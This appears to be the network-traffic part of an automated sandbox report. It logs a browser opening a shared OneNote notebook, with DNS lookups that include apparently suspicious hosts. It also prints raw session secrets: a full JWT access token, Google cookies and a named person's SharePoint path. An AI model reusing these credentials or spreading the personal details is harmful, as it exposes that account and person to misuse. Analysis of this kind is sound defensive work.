                                                Oct 3, 2022 15:38:34.852715969 CEST8.8.8.8192.168.2.30xc581No error (0)part-0032.t-0009.t-msedge.net13.107.213.60A (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:35.378267050 CEST8.8.8.8192.168.2.30xf41eNo error (0)spoprod-a.akamaihd.netspoprod-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:35.482640028 CEST8.8.8.8192.168.2.30x9b4bNo error (0)storage.live.comcommon-geo.ha.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:35.482640028 CEST8.8.8.8192.168.2.30x9b4bNo error (0)common-geo.ha.1drv.comcommon-geo.onedrive.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:35.482640028 CEST8.8.8.8192.168.2.30x9b4bNo error (0)dub01pcor003-com.be.1drv.comi-dub01p-cor003.api.p001.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:35.482640028 CEST8.8.8.8192.168.2.30x9b4bNo error (0)i-dub01p-cor003.api.p001.1drv.com40.90.128.21A (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:35.687199116 CEST8.8.8.8192.168.2.30xb48bNo error (0)www.onenote.comreverseproxy.onenote.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:35.806934118 CEST8.8.8.8192.168.2.30xc100No error (0)augloop.office.comaugloop-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:36.693103075 CEST8.8.8.8192.168.2.30x4a4bNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:38:47.502764940 CEST8.8.8.8192.168.2.30x88a1No error (0)byzo.pages.dev188.114.97.3A (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:47.502764940 CEST8.8.8.8192.168.2.30x88a1No error (0)byzo.pages.dev188.114.96.3A (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:38:50.096811056 CEST8.8.8.8192.168.2.30xe3e8No error (0)messaging.engagement.office.comprod-campaignaggregator.omexexternallfb.office.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:39:03.025917053 CEST8.8.8.8192.168.2.30xbde6No error (0)kccarpetsandfloorings.com68.65.120.250A (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:39:23.061657906 CEST8.8.8.8192.168.2.30x30e9No error (0)euc-onenote.wac.trafficmanager.net.b-0016.b-dc-msedge.net.b-0016.b-msedge.netb-0016.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:39:23.061657906 CEST8.8.8.8192.168.2.30x30e9No error (0)b-0016.b-msedge.net13.107.6.171A (IP address)IN (0x0001)false
                                                Oct 3, 2022 15:39:42.040494919 CEST8.8.8.8192.168.2.30x9aadNo error (0)www.onenote.comreverseproxy.onenote.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:39:56.103001118 CEST8.8.8.8192.168.2.30x8c49No error (0)augloop.office.comaugloop-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2022 15:40:17.105978012 CEST8.8.8.8192.168.2.30x9b2aNo error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false
                                                • accounts.google.com
                                                • clients2.google.com
                                                • insacentre-my.sharepoint.com
                                                • https:
                                                  • euc-onenote.officeapps.live.com
                                                  • amcdn.msftauth.net
                                                  • storage.live.com
                                                  • byzo.pages.dev
                                                  • kccarpetsandfloorings.com
                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.349707142.250.203.109443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:16 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                Host: accounts.google.com
                                                Connection: keep-alive
                                                Content-Length: 1
                                                Origin: https://www.google.com
                                                Content-Type: application/x-www-form-urlencoded
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: empty
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
                                                2022-10-03 13:38:16 UTC0OUTData Raw: 20
                                                Data Ascii:
                                                2022-10-03 13:38:16 UTC3INHTTP/1.1 200 OK
                                                Content-Type: application/json; charset=utf-8
                                                Access-Control-Allow-Origin: https://www.google.com
                                                Access-Control-Allow-Credentials: true
                                                X-Content-Type-Options: nosniff
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 03 Oct 2022 13:38:16 GMT
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                Content-Security-Policy: script-src 'report-sample' 'nonce-i73dNpf-jgK6PSrDVVQ69Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp"
                                                Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]}
                                                Server: ESF
                                                X-XSS-Protection: 0
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                Accept-Ranges: none
                                                Vary: Accept-Encoding
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                2022-10-03 13:38:16 UTC5INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                Data Ascii: 11["gaia.l.a.r",[]]
                                                2022-10-03 13:38:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.349704142.250.203.110443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:16 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                Host: clients2.google.com
                                                Connection: keep-alive
                                                X-Goog-Update-Interactivity: fg
                                                X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                X-Goog-Update-Updater: chromecrx-104.0.5112.81
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: empty
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2022-10-03 13:38:16 UTC2INHTTP/1.1 200 OK
                                                Content-Security-Policy: script-src 'report-sample' 'nonce-U_mR6ziepuuhMCkwwwHyGw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 03 Oct 2022 13:38:16 GMT
                                                Content-Type: text/xml; charset=UTF-8
                                                X-Daynum: 5754
                                                X-Daystart: 23896
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                X-XSS-Protection: 1; mode=block
                                                Server: GSE
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                Accept-Ranges: none
                                                Vary: Accept-Encoding
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                2022-10-03 13:38:16 UTC3INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 37 35 34 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 32 33 38 39 36 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5754" elapsed_seconds="23896"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                2022-10-03 13:38:16 UTC3INData Raw: 6d 78 76 59 6e 4d 76 4e 7a 49 30 51 55 46 58 4e 56 39 7a 54 32 52 76 64 55 77 79 4d 45 52 45 53 45 5a 47 56 6d 4a 6e 51 51 2f 31 2e 30 2e 30 2e 36 5f 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69
                                                Data Ascii: mxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" si
                                                2022-10-03 13:38:16 UTC3INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                10192.168.2.34973713.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:18 UTC282OUTPOST /o/OneNote.ashx HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 4172
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-ServerSideRendering: RenderingNoImages
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                X-Requested-With: XMLHttpRequest
                                                X-SessionStartDimensions: {"Application":"OneNote","Browser":"Chrome","BrowserMajorVersion":"104","BrowserVersion":"104.0.0","Host":"SharePoint Online","IsSynthetic":"False","Os":"Windows","Ring":"5","RoutedVia":"AzureFrontDoor","SessionOrigin":"SHARING","UserSessionApplicationMode":"Edit","WACDatacenter":"GEU2"}
                                                sec-ch-ua-platform: "Windows"
                                                X-AccessToken: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9.eyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0.EWb66LDcPK9or86SYiXEnS8X85go_GF6jrytmNe-VM0DP1xedkdH8-P7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O_cBiZszwxDu1rJtgjSTldsdPBQi-x4isn_tXs1kVY3k0U38ib-UTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe_YJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Content-Type: application/json; charset=UTF-8
                                                X-UserType: WOPI
                                                X-xhr: 1
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                2022-10-03 13:38:18 UTC286OUTData Raw: 7b 22 4d 6f 64 65 22 3a 31 2c 22 73 72 73 22 3a 5b 5b 31 2c 7b 22 46 69 6c 65 49 64 22 3a 22 57 4f 50 49 73 72 63 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 69 6e 73 61 63 65 6e 74 72 65 25 32 44 6d 79 25 32 45 73 68 61 72 65 70 6f 69 6e 74 25 32 45 63 6f 6d 25 32 46 70 65 72 73 6f 6e 61 6c 25 32 46 63 68 72 69 73 74 65 6c 25 35 46 63 68 65 76 65 72 65 61 75 25 35 46 69 6e 73 61 25 32 44 63 76 6c 25 35 46 66 72 25 32 46 25 35 46 76 74 69 25 35 46 62 69 6e 25 32 46 77 6f 70 69 25 32 45 61 73 68 78 25 32 46 66 6f 6c 64 65 72 73 25 32 46 35 63 36 32 37 33 32 34 62 34 65 36 34 39 36 37 61 33 31 61 35 63 32 65 32 37 36 37 61 32 61 30 26 61 63 63 65 73 73 5f 74 6f 6b 65 6e 3d 65 79 4a 30 65 58 41 69 4f 69 4a 4b 56 31 51 69 4c 43 4a 68 62 47 63 69 4f 69 4a 53
                                                Data Ascii: {"Mode":1,"srs":[[1,{"FileId":"WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJS
                                                2022-10-03 13:38:18 UTC291INHTTP/1.1 200 OK
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                Content-Length: 72906
                                                Content-Type: application/json; charset=utf-8
                                                Expires: -1
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 048e253a-41c9-4d2c-84e0-239a5ed37d96
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000006C5
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000006C5
                                                X-WacFrontEnd: AM1PEPF000006C5
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wordslice_control,afd_visioslice,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: BC7EE479961145A882D360E8A1057CD0 Ref B: AMS231032607031 Ref C: 2022-10-03T13:38:18Z
                                                Date: Mon, 03 Oct 2022 13:38:17 GMT
                                                Connection: close
                                                2022-10-03 13:38:18 UTC292INData Raw: ef bb bf 7b 22 52 65 73 70 6f 6e 73 65 73 22 3a 5b 5b 31 2c 7b 22 4f 70 65 72 61 74 69 6f 6e 49 64 22 3a 31 2c 22 53 74 61 74 75 73 43 6f 64 65 22 3a 30 2c 22 52 61 77 43 65 6c 6c 53 74 6f 72 61 67 65 45 72 72 6f 72 43 6f 64 65 22 3a 22 22 2c 22 53 65 72 76 65 72 50 61 67 65 53 74 61 74 73 54 72 61 63 65 22 3a 22 22 2c 22 46 69 6c 65 49 64 22 3a 22 57 4f 50 49 73 72 63 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 69 6e 73 61 63 65 6e 74 72 65 5c 75 30 30 32 35 32 44 6d 79 5c 75 30 30 32 35 32 45 73 68 61 72 65 70 6f 69 6e 74 5c 75 30 30 32 35 32 45 63 6f 6d 5c 75 30 30 32 35 32 46 70 65 72 73 6f 6e 61 6c 5c 75 30 30 32 35 32 46 63 68 72 69 73 74 65 6c 5c 75 30 30 32 35 35 46 63 68 65 76 65 72 65 61 75 5c 75 30
                                                Data Ascii: {"Responses":[[1,{"OperationId":1,"StatusCode":0,"RawCellStorageErrorCode":"","ServerPageStatsTrace":"","FileId":"WOPIsrc=https\u00253A\u00252F\u00252Finsacentre\u00252Dmy\u00252Esharepoint\u00252Ecom\u00252Fpersonal\u00252Fchristel\u00255Fchevereau\u0
                                                2022-10-03 13:38:18 UTC293INData Raw: 79 55 7a 59 57 46 75 62 32 34 6a 4e 47 4d 79 59 6d 52 6c 4d 32 52 6a 4e 6d 59 78 59 6d 52 6b 4f 54 4a 69 4d 54 51 32 5a 6d 56 6b 4e 32 45 32 5a 44 49 32 4e 7a 4e 69 5a 54 5a 68 59 6d 45 7a 4f 47 55 34 4d 6d 52 68 4d 47 59 7a 4e 7a 68 6c 4d 44 4e 6d 4f 44 41 7a 59 54 45 32 4d 54 59 30 59 79 49 73 49 6e 4e 6f 59 58 4a 70 62 6d 64 70 5a 43 49 36 49 6c 6b 7a 62 53 74 35 53 32 31 6e 51 57 74 31 53 45 73 72 62 46 46 6a 57 6a 4a 53 4c 33 63 69 4c 43 4a 70 63 32 78 76 62 33 42 69 59 57 4e 72 49 6a 6f 69 56 48 4a 31 5a 53 49 73 49 6d 46 77 63 47 4e 30 65 43 49 36 49 6a 56 6a 4e 6a 49 33 4d 7a 49 30 59 6a 52 6c 4e 6a 51 35 4e 6a 64 68 4d 7a 46 68 4e 57 4d 79 5a 54 49 33 4e 6a 64 68 4d 6d 45 77 4f 30 31 4e 53 57 39 6b 56 48 56 72 4d 6e 68 61 63 44 52 54 54 46 49 79
                                                Data Ascii: yUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIy
                                                2022-10-03 13:38:18 UTC301INData Raw: 69 73 69 6f 6e 4c 69 73 74 22 3a 5b 7b 22 42 61 73 65 49 64 22 3a 22 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7c 30 22 2c 22 4f 62 6a 65 63 74 47 72 6f 75 70 73 22 3a 5b 7b 22 49 64 22 3a 22 63 39 62 64 36 33 34 61 2d 61 34 33 38 2d 34 36 36 66 2d 39 34 38 39 2d 39 62 36 34 61 32 38 33 37 64 32 30 7c 34 38 22 2c 22 4f 62 6a 65 63 74 73 22 3a 5b 7b 22 43 6c 61 73 73 49 64 22 3a 33 39 33 32 32 33 2c 22 4f 62 6a 65 63 74 49 64 22 3a 22 63 39 62 64 36 33 34 61 2d 61 34 33 38 2d 34 36 36 66 2d 39 34 38 39 2d 39 62 36 34 61 32 38 33 37 64 32 30 7c 31 31 22 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 34 30 32 36 36 30 34 35 33 2c 22 31 36 36 34 37 39 38 32 31 30 30 30 30 22 2c 34 36 39 37 36 39
                                                Data Ascii: isionList":[{"BaseId":"00000000-0000-0000-0000-000000000000|0","ObjectGroups":[{"Id":"c9bd634a-a438-466f-9489-9b64a2837d20|48","Objects":[{"ClassId":393223,"ObjectId":"c9bd634a-a438-466f-9489-9b64a2837d20|11","Properties":[402660453,"1664798210000",469769
                                                2022-10-03 13:38:18 UTC307INData Raw: 34 63 33 68 58 4f 54 42 48 4d 6c 39 5a 64 31 6c 57 52 47 64 49 59 79 4a 39 5c 75 30 30 32 35 32 45 65 79 4a 68 64 57 51 69 4f 69 4a 33 62 33 42 70 4c 32 6c 75 63 32 46 6a 5a 57 35 30 63 6d 55 74 62 58 6b 75 63 32 68 68 63 6d 56 77 62 32 6c 75 64 43 35 6a 62 32 31 41 5a 6a 63 30 4d 6a 45 30 4e 54 41 74 5a 47 59 78 4e 69 30 30 4e 7a 45 30 4c 57 46 6b 59 54 45 74 4d 7a 6b 31 4d 7a 6b 77 59 32 49 35 4d 57 51 7a 49 69 77 69 61 58 4e 7a 49 6a 6f 69 4d 44 41 77 4d 44 41 77 4d 44 4d 74 4d 44 41 77 4d 43 30 77 5a 6d 59 78 4c 57 4e 6c 4d 44 41 74 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 51 44 6b 77 4d 54 51 77 4d 54 49 79 4c 54 67 31 4d 54 59 74 4d 54 46 6c 4d 53 30 34 5a 57 5a 6d 4c 54 51 35 4d 7a 41 30 4f 54 49 30 4d 44 45 35 59 69 49 73 49 6d 35 69 5a 69
                                                Data Ascii: 4c3hXOTBHMl9Zd1lWRGdIYyJ9\u00252EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZi
                                                2022-10-03 13:38:18 UTC315INData Raw: 33 38 2d 34 36 36 66 2d 39 34 38 39 2d 39 62 36 34 61 32 38 33 37 64 32 30 7c 32 31 22 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 32 30 31 33 34 30 31 32 32 2c 22 32 22 2c 32 36 38 34 34 32 36 33 35 2c 22 32 32 22 2c 33 33 35 35 35 31 35 30 30 2c 22 34 32 37 38 31 39 30 30 38 30 22 2c 33 33 35 35 35 37 36 37 38 2c 22 30 22 2c 33 33 35 35 35 37 36 37 39 2c 22 30 22 2c 34 36 39 37 36 39 32 32 36 2c 22 43 61 6c 69 62 72 69 22 2c 34 36 39 37 37 35 34 35 30 2c 22 70 22 5d 7d 2c 7b 22 43 6c 61 73 73 49 64 22 3a 31 31 37 39 37 32 35 2c 22 4f 62 6a 65 63 74 49 64 22 3a 22 63 39 62 64 36 33 34 61 2d 61 34 33 38 2d 34 36 36 66 2d 39 34 38 39 2d 39 62 36 34 61 32 38 33 37 64 32 30 7c 32 32 22 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 32 30 31 33 34 30 31 32 32
                                                Data Ascii: 38-466f-9489-9b64a2837d20|21","Properties":[201340122,"2",268442635,"22",335551500,"4278190080",335557678,"0",335557679,"0",469769226,"Calibri",469775450,"p"]},{"ClassId":1179725,"ObjectId":"c9bd634a-a438-466f-9489-9b64a2837d20|22","Properties":[201340122
